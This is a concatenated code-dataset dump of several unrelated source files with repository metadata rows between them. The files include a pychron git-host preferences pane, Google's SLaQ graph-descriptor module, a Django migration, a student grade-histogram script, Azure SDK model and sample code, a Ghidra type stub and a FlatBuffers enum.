# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import requests
from envisage.ui.tasks.preferences_pane import PreferencesPane
from traits.api import Str, Password, Button, Color, Bool
from traitsui.api import View, Item, VGroup, HGroup
from pychron.core.ui.custom_label_editor import CustomLabel
from pychron.envisage.tasks.base_preferences_helper import (
BasePreferencesHelper,
test_connection_item,
)
from pychron.git.hosts import authorization
from pychron.globals import globalv
class GitHostPreferences(BasePreferencesHelper):
    """Common preference model for git hosting services.

    Subclasses must provide ``_url`` (the endpoint used by the connection
    test) and ``_token`` (the Authorization header value derived from
    ``oauth_token``).
    """
    username = Str
    password = Password
    oauth_token = Str
    default_remote_name = Str
    organization = Str
    disable_authentication_message = Bool
    # UI button; pressing it invokes _test_connection_fired below.
    test_connection = Button
    # Transient status text/color displayed next to the button.
    _remote_status = Str
    _remote_status_color = Color
    def _test_connection_fired(self):
        """Validate the configured credentials by GETing ``self._url``.

        Sets ``_remote_status``/``_remote_status_color`` to Valid/green on
        HTTP 200, and leaves them Invalid/red on any other outcome.
        """
        self._remote_status_color = "red"
        self._remote_status = "Invalid"
        try:
            kw = {"verify": globalv.cert_file}
            if self._token:
                # Prefer token auth whenever an OAuth token is configured.
                header = authorization("", "", self._token)
                kw["headers"] = header
            else:
                kw["auth"] = (self.username, self.password)
            resp = requests.get(self._url, **kw)
            if resp.status_code == 200:
                self._remote_status = "Valid"
                self._remote_status_color = "green"
        except BaseException as e:
            # NOTE(review): broad BaseException catch with a bare print
            # looks like leftover debugging -- consider logging instead.
            print("exception", e, self._url)
class GitHubPreferences(GitHostPreferences):
preferences_path = "pychron.github"
_url = "https://api.github.com/user"
@property
def _token(self):
if self.oauth_token:
return "token {}".format(self.oauth_token)
class GitLabPreferences(GitHostPreferences):
host = Str
preferences_path = "pychron.gitlab"
@property
def _url(self):
return "https://{}".format(self.host)
@property
def _token(self):
if self.oauth_token:
return "Bearer {}".format(self.oauth_token)
class GitHostPreferencesPane(PreferencesPane):
def _cred_group(self):
g = VGroup(
Item("organization"),
# VGroup(Item('username'),
# Item('password'),
# show_border=True, label='Basic'),
Item(
"disable_authentication_message",
tooltip="This message is displayed to Windows users on start up as a reminder to setup "
"authentication",
label="Disable Authentication Message",
),
VGroup(
Item(
"oauth_token",
tooltip="Enter a Personal Access Token",
resizable=True,
label="Token",
),
show_border=True,
label="OAuth",
),
HGroup(
test_connection_item(),
CustomLabel(
"_remote_status", width=50, color_name="_remote_status_color"
),
),
show_border=True,
label="Credentials",
)
return g
def traits_view(self):
v = View(
self._cred_group(), Item("default_remote_name", label="Default Remote")
)
return v
class GitHubPreferencesPane(GitHostPreferencesPane):
model_factory = GitHubPreferences
category = "GitHub"
class GitLabPreferencesPane(GitHostPreferencesPane):
model_factory = GitLabPreferences
category = "GitLab"
def traits_view(self):
hg = VGroup(Item("host"))
v = View(VGroup(self._cred_group(), hg))
return v
# ============= EOF =============================================
| [
"jirhiker@gmail.com"
] | jirhiker@gmail.com |
d44084bd0082b1994125b02a466cdac8bbb39e1c | e10a6d844a286db26ef56469e31dc8488a8c6f0e | /graph_embedding/slaq/slaq.py | c5b398335c01701b00c343f9a6e09a7eb1c38303 | [
"Apache-2.0",
"CC-BY-4.0"
] | permissive | Jimmy-INL/google-research | 54ad5551f97977f01297abddbfc8a99a7900b791 | 5573d9c5822f4e866b6692769963ae819cb3f10d | refs/heads/master | 2023-04-07T19:43:54.483068 | 2023-03-24T16:27:28 | 2023-03-24T16:32:17 | 282,682,170 | 1 | 0 | Apache-2.0 | 2020-07-26T15:50:32 | 2020-07-26T15:50:31 | null | UTF-8 | Python | false | false | 4,522 | py | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main SLaQ interface for approximating graph descritptors NetLSD and VNGE."""
import numpy as np
from scipy.sparse.base import spmatrix
from graph_embedding.slaq.slq import slq
from graph_embedding.slaq.util import laplacian
def _slq_red_var_netlsd(matrix, lanczos_steps, nvectors,
                        timescales):
  """Computes unnormalized NetLSD signatures of a given matrix.

  Uses the control variates method to reduce the variance of NetLSD
  estimation.

  Args:
    matrix (sparse matrix): Input adjacency matrix of a graph.
    lanczos_steps (int): Number of Lanczos steps.
    nvectors (int): Number of random vectors for stochastic estimation.
    timescales (np.ndarray): Timescale parameter for NetLSD computation. Default
      value is the one used in both NetLSD and SLaQ papers.

  Returns:
    np.ndarray: Approximated NetLSD descriptors.
  """
  # Estimate the heat-kernel trace and, as a control variate, the trace of
  # the identity function in a single SLQ pass.
  functions = [np.exp, lambda x: x]
  traces = slq(matrix, lanczos_steps, nvectors, functions, -timescales)
  # Variance-reduction correction terms; see the SLaQ paper for the
  # derivation of the exact control-variate expectation used here.
  subee = traces[0, :] - traces[1, :] / np.exp(timescales)
  sub = -timescales * matrix.shape[0] / np.exp(timescales)
  return np.array(subee + sub)
def _slq_red_var_vnge(matrix, lanczos_steps,
                      nvectors):
  """Approximates Von Neumann Graph Entropy (VNGE) of a given matrix.

  Uses the control variates method to reduce the variance of VNGE
  estimation.

  Args:
    matrix (sparse matrix): Input adjacency matrix of a graph.
    lanczos_steps (int): Number of Lanczos steps.
    nvectors (int): Number of random vectors for stochastic estimation.

  Returns:
    float: Approximated von Neumann graph entropy.
  """
  # Spectral entropy -x*log(x) (defined as 0 for x <= 0), plus the identity
  # function as the control variate.
  functions = [lambda x: -np.where(x > 0, x * np.log(x), 0), lambda x: x]
  traces = slq(matrix, lanczos_steps, nvectors, functions).ravel()
  # A density matrix has unit trace, so the identity estimate's exact
  # expectation is 1; subtract the estimate and add back the exact value.
  return traces[0] - traces[1] + 1
def vnge(adjacency,
         lanczos_steps = 10,
         nvectors = 100):
  """Computes Von Neumann Graph Entropy (VNGE) using SLaQ.

  Args:
    adjacency (scipy.sparse.base.spmatrix): Input adjacency matrix of a graph.
    lanczos_steps (int): Number of Lanczos steps. Setting lanczos_steps=10 is
      the default from SLaQ.
    nvectors (int): Number of random vectors for stochastic estimation. Setting
      nvectors=10 is the default values from the SLaQ paper.

  Returns:
    float: Approximated VNGE.
  """
  if adjacency.nnz == 0:  # By convention, if x=0, x*log(x)=0.
    return 0
  density = laplacian(adjacency, False)
  # Scale the (unnormalized) Laplacian into a density matrix: divide by its
  # trace so that the diagonal sums to 1.
  density.data /= np.sum(density.diagonal()).astype(np.float32)
  return _slq_red_var_vnge(density, lanczos_steps, nvectors)
def netlsd(adjacency,
           timescales = np.logspace(-2, 2, 256),
           lanczos_steps = 10,
           nvectors = 100,
           normalization = None):
  """Computes NetLSD descriptors using SLaQ.

  Args:
    adjacency (sparse matrix): Input adjacency matrix of a graph.
    timescales (np.ndarray): Timescale parameter for NetLSD computation. Default
      value is the one used in both NetLSD and SLaQ papers.
    lanczos_steps (int): Number of Lanczos steps. Setting lanczos_steps=10 is
      the default from SLaQ.
    nvectors (int): Number of random vectors for stochastic estimation. Setting
      nvectors=10 is the default values from the SLaQ paper.
    normalization (str): Normalization type for NetLSD, one of
      [None, 'empty', 'complete'].

  Returns:
    np.ndarray: Approximated NetLSD descriptors.

  Raises:
    ValueError: If ``normalization`` is not one of the supported values.
  """
  lap = laplacian(adjacency, True)
  hkt = _slq_red_var_netlsd(lap, lanczos_steps, nvectors,
                            timescales)  # Approximated Heat Kernel Trace (hkt).
  if normalization is None:
    return hkt
  n = lap.shape[0]
  # The duplicate unreachable `elif normalization is None` branch of the
  # original was removed; None is fully handled above.
  if normalization == 'empty':
    # Normalize by the heat-trace of the empty graph (n isolated vertices).
    return hkt / n
  elif normalization == 'complete':
    # Normalize by the closed-form heat-trace of the complete graph.
    return hkt / (1 + (n - 1) * np.exp(-timescales))
  else:
    raise ValueError(
        "Unknown normalization type: expected one of [None, 'empty', 'complete'], got",
        normalization)
| [
"copybara-worker@google.com"
] | copybara-worker@google.com |
3fc64ef0e80d80509d96c399a394a6be9418809f | 53fa2c914dd1183c7ba8a2c5f564e0c0c1cbaedd | /Gym/web_athlete/migrations/0015_auto_20180804_1844.py | 920df02025b7d21d684f49208b13ebbc56544c88 | [
"MIT"
] | permissive | ahmadreza-smdi/GymManagement | 718c8dbeddc968097643a413b2ad7d882d0b864f | 03f4d6d7b8d8ebefc70c2e921b64888afc3e6b28 | refs/heads/master | 2021-06-19T14:56:41.021617 | 2019-11-24T20:58:56 | 2019-11-24T20:58:56 | 142,736,163 | 6 | 1 | MIT | 2021-06-10T20:43:43 | 2018-07-29T06:20:07 | Python | UTF-8 | Python | false | false | 1,347 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-08-04 18:44
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('web_athlete', '0014_auto_20180804_1801'),
]
operations = [
migrations.AddField(
model_name='time_option',
name='username',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
migrations.AlterField(
model_name='class_times',
name='Open_times',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Time_option'),
),
migrations.AlterField(
model_name='fields',
name='class_time',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Class_times'),
),
migrations.AlterField(
model_name='member',
name='field',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='web_athlete.Fields'),
),
]
| [
"ahmadreza.smdi@gmail.com"
] | ahmadreza.smdi@gmail.com |
443e27562eaab35764faa3c919b8368e9c63009e | 064190a2de1ad156e1060f0efdee7e754a96b4bb | /9.7.py | 32b4343aa60f537c7519d6b2836ff21ac1c9f9cf | [] | no_license | zqy1/pythonCookbook | 7254fadf3fac277b107941bc32e4716de3f7c329 | 89a05a2a4d723fb49548e0e87d2542bd5d07fbee | refs/heads/master | 2020-08-03T17:27:09.351396 | 2015-09-18T13:05:14 | 2015-09-18T13:05:14 | 73,540,483 | 1 | 0 | null | 2016-11-12T08:14:50 | 2016-11-12T08:14:50 | null | UTF-8 | Python | false | false | 1,366 | py | # -*- coding: utf-8 -*-
"""
9.7.py
~~~~~~
利用装饰器对函数参数进行强制类型检查
"""
# 函数签名对象的应用
from inspect import signature
from functools import wraps, partial
def typeassert(*ty_args, **ty_kwargs):
    """Decorator factory enforcing argument types at call time.

    Expected types are given positionally or by keyword and matched to the
    decorated function's parameters through its signature.  When Python
    runs in optimized mode (``__debug__`` is False) no checking is done.
    """
    def decorate(func):
        # Optimized mode: return the function untouched, skip all checks.
        if not __debug__:
            return func
        sig = signature(func)
        # Map parameter names to the types declared for them.
        expected = sig.bind_partial(*ty_args, **ty_kwargs).arguments
        @wraps(func)
        def wrapper(*args, **kwargs):
            actual = sig.bind(*args, **kwargs).arguments
            # Enforce each declared type against the supplied value.
            for name, required in expected.items():
                if name in actual and not isinstance(actual[name], required):
                    raise TypeError(
                        'Argument {} must be {}'.format(name, required)
                        )
            return func(*args, **kwargs)
        return wrapper
    return decorate
# 使用这个装饰器
# 通过参数指定类型检查
@typeassert(int, int)
def add(x:int, y:int) -> int:
print (x + y)
# test1
add(2, 4)
# test2
add('neo1218', 5)
# test3
add(3, y=6)
| [
"neo1218@yeah.net"
] | neo1218@yeah.net |
5fcfd400e2e36486c52783aa82476ba6e3b3c8ae | 107fdd20682510440fc002c5b26ce6d51227d23d | /p49_misc/p49b_wave_evol.py | a30801b43baef3bcc3028dfa78aad20ca2dccb16 | [] | no_license | dcollins4096/ytscripts | bddb1a82b30d533e5789a16109dca9226713c76d | 52d8337dbbcba5d004663ec2cd1d2a15503c952d | refs/heads/master | 2022-07-29T07:44:18.847626 | 2022-07-18T13:17:11 | 2022-07-18T13:17:11 | 185,677,619 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,258 | py |
if 'ef' not in dir():
execfile('go')
for i in range(3):
print("====================")
import enzo_write
reload(enzo_write)
import p49_eigen
reload(p49_eigen)
import p49_plot_tools
reload(p49_plot_tools)
import matplotlib.colors as colors
def nz(field):
    """Return only the elements of ``field`` whose magnitude exceeds 1e-13."""
    mask = np.abs(field) > 1e-13
    return field[mask]
frame_list=[0]
this_formt = 'png'
get_from='ic'
#plot_style = 'r_theta'
#plot_style = 'proj'
plot_style = 'hist_tot'
if 1:
if 'lazy_ds' not in dir():
lazy_ds = {}
for frame in frame_list:
if 1:
if 0:
this_name = 'y701'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/y701_rb96_fft_f-_play'
if 0:
this_name = 'r801'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/r801_rj95_110_f-'
if 0:
this_name = 'rA01'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/rA01_rb96_110_f-'
if 1:
this_name = 'rB01'
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/rB01_rb_several'
#frame//wave//xy//xz//yz?//real//imag//magnitude//phase
#https://matplotlib.org/users/colormapnorms.html
plt.close('all')
if frame not in lazy_ds:
if get_from=='yt':
ds = lazy_ds.get(frame,yt.load("%s/DD%04d/data%04d"%(directory,frame,frame)))
stuff = p49_eigen.get_cubes_cg(ds)
#lazy_ds[frame]=stuff
elif get_from=='ic':
this_name = 'rB01_ic'
stuff = p49_plot.tools.chomp(directory=directory)
else:
print("Extant Stuff")
#lazy_ds[frame]=ds
else:
stuff = lazy_ds[frame]
print_fields = False
print_waves = True
#these_means = stuff['means']
#these_ffts = p49_eigen.get_ffts(stuff['cubes'], these_means)
#kall,wut=p49_eigen.rotate_back(these_ffts, these_means)
#kmag = (kall[0,...]**2+kall[1,...]**2+kall[2,...]**2)**0.5
if plot_style == 'hist_tot':
oname = '%s_%04d_hist.%s'%(this_name, frame, this_formt)
p49_plot_tools.plot_wave_mag(stuff=stuff,output_name=oname)
"""
fig = plt.figure(figsize=(8,8)) # Notice the equal aspect ratio
fig.suptitle('%s_%04d %s'%(this_name,frame,wave))
#ax = [fig.add_subplot(1,1,i+1) for i in range(6)]
ax = [fig.add_subplot(1,1,1,projection='polar')]
for a in ax:
a.set_xticklabels([])
a.set_yticklabels([])
a.set_aspect('equal')
all_angle = np.angle(this_fft)
flag = np.abs(this_fft) > 1e-9
this_kmag = kmag[flag]
this_angle = all_angle[flag]
oname = '%s_%04d_%s_rtheta.%s'%(this_name, frame, wave, this_formt)
ax[0].scatter(this_angle, this_kmag)
for a in ax:
a.set_rmax(16)
fig.savefig(oname)
print(oname)
"""
if plot_style == 'r_theta':
p49_plot_tools.plot_k_rad(wut=wut,prefix="%s_%04d"%(this_name,frame))
if plot_style == 'proj':
p49_plot_tools.plot_k_proj(wut=wut,prefix="%s_%04d"%(this_name,frame))
if 0:
#old shit?
#Test. Frame 0 has only f-.
frame = 0
directory = '/Users/dcollins/scratch/Paper49b_play/Eigen/y701_rb96_fft_f-_play'
ds = yt.load("%s/DD%04d/data%04d"%(directory,frame,frame))
stuff = p49_eigen.get_cubes_cg(ds)
these_means = stuff['means']
these_ffts = p49_eigen.get_ffts(stuff['cubes'], these_means)
print_fields = False
print_waves = True
kall,wut=p49_eigen.rotate_back(these_ffts, these_means)
fl = np.zeros_like(wut.wave_frame['d']).astype('bool')
if print_fields:
for field in wut.wave_frame:
print(" ===== %s ===="%field)
thisthing = wut.wave_frame[field]
thisthing = wut.dumb[field]
this_bool = np.abs(thisthing) > 1e-13
#fl = np.logical_or(fl, this_bool)
nonzeros = len( this_bool )
print(" eigen %s"%str(tsfft.right['f-'][field]))
print(" rot %s"%str(tsfft.rot[field]))
print("all_hat %3s %s"%(field, nz(tsfft.all_hats[field])))
aaa = these_ffts[field] #is good.
print("also fft input k %3s %s"%(field, str(nz(aaa).size)))
print("this wave frame k %3s %s"%(field, str(nz(thisthing).size)))
if print_waves:
for wave in wut.wave_content:
thisthing = wut.wave_content[wave]
bang_or_not = ""
if ( np.abs(thisthing)>1e-12).sum() > 0:
bang_or_not = "!!!"*8 + " meann %0.2e max %0.2e"%(np.mean(np.abs(thisthing)),np.abs(thisthing).max())
print("=== Wave %s %s"%(wave, bang_or_not))
s1 = str(nz(thisthing.real).size)
s2 = str(nz(thisthing.imag).size)
print("wave real nz %s imag %s"%(s1,s2))
| [
"none@none"
] | none@none |
41a662baf31d2a62914571ab1a7592adfc372ea5 | 98c6ea9c884152e8340605a706efefbea6170be5 | /examples/data/Assignment_6/wrtjos001/question4.py | af7b9aca381af051a7c7950504ed8316f3d9ed66 | [] | no_license | MrHamdulay/csc3-capstone | 479d659e1dcd28040e83ebd9e3374d0ccc0c6817 | 6f0fa0fa1555ceb1b0fb33f25e9694e68b6a53d2 | refs/heads/master | 2021-03-12T21:55:57.781339 | 2014-09-22T02:22:22 | 2014-09-22T02:22:22 | 22,372,174 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | """Assignment 6 Question 4 histogram reprentation of marks
joshua wort
20 april 2014"""
# Read the space-separated list of marks from the user.
mark = input("Enter a space-separated list of marks:\n")
marks = mark.split(" ")

# One bar of "X"s per grade band.
F = ""              # below 50
third = ""          # 50-59
lower_second = ""   # 60-69
upper_second = ""   # 70-74
first = ""          # 75 and above

# Sort each mark into its grade band.
# float() replaces the original eval(): eval executes arbitrary code and is
# unsafe on user input, while float() accepts the same numeric marks.
for mark in marks:
    score = float(mark)
    if score < 50:
        F += "X"
    elif score < 60:
        third += "X"
    elif score < 70:
        lower_second += "X"
    elif score < 75:
        upper_second += "X"
    else:
        first += "X"

# Print the histogram, best band first.
print("1 |", first, sep="")
print("2+|", upper_second, sep="")
print("2-|", lower_second, sep="")
print("3 |", third, sep="")
print("F |", F, sep="")
| [
"jarr2000@gmail.com"
] | jarr2000@gmail.com |
6cc0276162bd2ed931565851eac5f8bd360435a6 | 87ac76b8aae5bf1c8a1530cd317972e4cf54fd62 | /azext_iot/sdk/dps/service/models/device_capabilities.py | 271a4829262e4d8e1f1b373d3572d394b0ccbf2c | [
"MIT"
] | permissive | montgomp/azure-iot-cli-extension | 911dbb10bb27d1b4ba2446fad4e37014c99bea6e | 7dee61b369f5dd7c7b9753edfc87b8ed35841c72 | refs/heads/dev | 2023-08-28T18:58:16.052628 | 2021-10-21T21:13:11 | 2021-10-21T21:13:11 | 271,131,011 | 1 | 1 | NOASSERTION | 2020-08-05T15:56:03 | 2020-06-09T23:30:08 | Python | UTF-8 | Python | false | false | 1,094 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class DeviceCapabilities(Model):
    """Device capabilities.

    All required parameters must be populated in order to send to Azure.

    :param iot_edge: Required. If set to true, this device is an IoTEdge
     device. Default value: False .
    :type iot_edge: bool
    """

    # msrest metadata: iot_edge must always be present on the wire.
    _validation = {'iot_edge': {'required': True}}

    # msrest metadata: Python attribute name -> JSON key and wire type.
    _attribute_map = {'iot_edge': {'key': 'iotEdge', 'type': 'bool'}}

    def __init__(self, **kwargs):
        super(DeviceCapabilities, self).__init__(**kwargs)
        # Equivalent to kwargs.get('iot_edge', False): fall back to False
        # only when the keyword was not supplied at all.
        self.iot_edge = kwargs['iot_edge'] if 'iot_edge' in kwargs else False
| [
"noreply@github.com"
] | montgomp.noreply@github.com |
878bf8ebbffb082312d112adc9e428be9d482b7c | aa0270b351402e421631ebc8b51e528448302fab | /sdk/containerservice/azure-mgmt-containerservice/generated_samples/managed_clusters_start.py | 72576c0ff6c89fa7ed554926a27a70117d305085 | [
"MIT",
"LGPL-2.1-or-later",
"LicenseRef-scancode-generic-cla"
] | permissive | fangchen0601/azure-sdk-for-python | d04a22109d0ff8ff209c82e4154b7169b6cb2e53 | c2e11d6682e368b2f062e714490d2de42e1fed36 | refs/heads/master | 2023-05-11T16:53:26.317418 | 2023-05-04T20:02:16 | 2023-05-04T20:02:16 | 300,440,803 | 0 | 0 | MIT | 2020-10-16T18:45:29 | 2020-10-01T22:27:56 | null | UTF-8 | Python | false | false | 1,579 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from azure.identity import DefaultAzureCredential
from azure.mgmt.containerservice import ContainerServiceClient
"""
# PREREQUISITES
pip install azure-identity
pip install azure-mgmt-containerservice
# USAGE
python managed_clusters_start.py
Before run the sample, please set the values of the client ID, tenant ID and client secret
of the AAD application as environment variables: AZURE_CLIENT_ID, AZURE_TENANT_ID,
AZURE_CLIENT_SECRET. For more info about how to get the value, please see:
https://docs.microsoft.com/azure/active-directory/develop/howto-create-service-principal-portal
"""
def main():
    """Start the sample managed cluster and print the operation result."""
    credential = DefaultAzureCredential()
    client = ContainerServiceClient(
        credential=credential,
        subscription_id="subid1",
    )

    # begin_start returns a long-running-operation poller; .result() blocks
    # until the cluster start operation completes.
    poller = client.managed_clusters.begin_start(
        resource_group_name="rg1",
        resource_name="clustername1",
    )
    print(poller.result())


# x-ms-original-file: specification/containerservice/resource-manager/Microsoft.ContainerService/aks/stable/2023-03-01/examples/ManagedClustersStart.json
if __name__ == "__main__":
    main()
| [
"noreply@github.com"
] | fangchen0601.noreply@github.com |
01784bb1eed1a0d1dc4408f4dfd22848c152afd1 | 786027545626c24486753351d6e19093b261cd7d | /ghidra9.2.1_pyi/ghidra/app/plugin/core/datamgr/actions/DeleteArchiveAction.pyi | 40829decee32b762b3894713f6a134b1ed84c7c4 | [
"MIT"
] | permissive | kohnakagawa/ghidra_scripts | 51cede1874ef2b1fed901b802316449b4bf25661 | 5afed1234a7266c0624ec445133280993077c376 | refs/heads/main | 2023-03-25T08:25:16.842142 | 2021-03-18T13:31:40 | 2021-03-18T13:31:40 | 338,577,905 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,409 | pyi | import docking
import docking.action
import ghidra.util
import java.beans
import java.lang
import java.util
import java.util.function
import javax.swing
class DeleteArchiveAction(docking.action.DockingAction):
    """Type stub for Ghidra's DeleteArchiveAction docking action.

    Auto-generated .pyi stub: every method body is an ellipsis and exists
    only for IDE completion / static analysis, never for execution.
    NOTE(review): the stub references `unicode`, `long`, and a bare
    `@overload` decorator without an import -- these are not valid Python 3
    stdlib names; confirm the stub generator's conventions before use.
    """

    def __init__(self, __a0: ghidra.app.plugin.core.datamgr.DataTypeManagerPlugin): ...

    def actionPerformed(self, __a0: docking.ActionContext) -> None: ...

    def addPropertyChangeListener(self, __a0: java.beans.PropertyChangeListener) -> None: ...

    def createButton(self) -> javax.swing.JButton: ...

    def createMenuItem(self, __a0: bool) -> javax.swing.JMenuItem: ...

    def dispose(self) -> None: ...

    def enabledWhen(self, __a0: java.util.function.Predicate) -> None: ...

    def equals(self, __a0: object) -> bool: ...

    def firePropertyChanged(self, __a0: unicode, __a1: object, __a2: object) -> None: ...

    def getClass(self) -> java.lang.Class: ...

    def getDefaultKeyBindingData(self) -> docking.action.KeyBindingData: ...

    def getDescription(self) -> unicode: ...

    def getFullName(self) -> unicode: ...

    def getHelpInfo(self) -> unicode: ...

    def getHelpObject(self) -> object: ...

    def getInceptionInformation(self) -> unicode: ...

    def getKeyBinding(self) -> javax.swing.KeyStroke: ...

    def getKeyBindingData(self) -> docking.action.KeyBindingData: ...

    def getKeyBindingType(self) -> docking.action.KeyBindingType: ...

    def getMenuBarData(self) -> docking.action.MenuData: ...

    def getName(self) -> unicode: ...

    def getOwner(self) -> unicode: ...

    def getOwnerDescription(self) -> unicode: ...

    def getPopupMenuData(self) -> docking.action.MenuData: ...

    def getToolBarData(self) -> docking.action.ToolBarData: ...

    def hashCode(self) -> int: ...

    def isAddToPopup(self, __a0: docking.ActionContext) -> bool: ...

    def isEnabled(self) -> bool: ...

    def isEnabledForContext(self, __a0: docking.ActionContext) -> bool: ...

    def isValidContext(self, __a0: docking.ActionContext) -> bool: ...

    def markHelpUnnecessary(self) -> None: ...

    def notify(self) -> None: ...

    def notifyAll(self) -> None: ...

    def popupWhen(self, __a0: java.util.function.Predicate) -> None: ...

    def removePropertyChangeListener(self, __a0: java.beans.PropertyChangeListener) -> None: ...

    def setDescription(self, __a0: unicode) -> None: ...

    def setEnabled(self, __a0: bool) -> None: ...

    def setHelpLocation(self, __a0: ghidra.util.HelpLocation) -> None: ...

    def setKeyBindingData(self, __a0: docking.action.KeyBindingData) -> None: ...

    def setMenuBarData(self, __a0: docking.action.MenuData) -> None: ...

    def setPopupMenuData(self, __a0: docking.action.MenuData) -> None: ...

    def setSupportsDefaultToolContext(self, __a0: bool) -> None: ...

    def setToolBarData(self, __a0: docking.action.ToolBarData) -> None: ...

    def setUnvalidatedKeyBindingData(self, __a0: docking.action.KeyBindingData) -> None: ...

    def shouldAddToWindow(self, __a0: bool, __a1: java.util.Set) -> bool: ...

    def supportsDefaultToolContext(self) -> bool: ...

    def toString(self) -> unicode: ...

    def validContextWhen(self, __a0: java.util.function.Predicate) -> None: ...

    @overload
    def wait(self) -> None: ...

    @overload
    def wait(self, __a0: long) -> None: ...

    @overload
    def wait(self, __a0: long, __a1: int) -> None: ...
| [
"tsunekou1019@gmail.com"
] | tsunekou1019@gmail.com |
7873a3bafeebce9c3624c8c3a5b2b8862708fd5e | 61ef327bd1d5ff6db7595221db6823c947dab42b | /FlatData/EndCondition.py | 6c4cf20c8a8847cbbfba3d3009e7e7918cb49579 | [] | no_license | Aikenfell/Blue-Archive---Asset-Downloader | 88e419686a80b20b57a10a3033c23c80f86d6bf9 | 92f93ffbdb81a47cef58c61ec82092234eae8eec | refs/heads/main | 2023-09-06T03:56:50.998141 | 2021-11-19T12:41:58 | 2021-11-19T12:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: FlatData
class EndCondition(object):
    """FlatBuffers-generated enum of end-condition codes.

    Generated by the FlatBuffers compiler; the numeric values mirror the
    schema and must not be changed by hand (see the "do not modify" header
    of this file).
    """
    Duration = 0
    ReloadCount = 1
    AmmoCount = 2
    AmmoHit = 3
    HitCount = 4
    None_ = 5
    UseExSkillCount = 6
| [
"rkolbe96@gmail.com"
] | rkolbe96@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.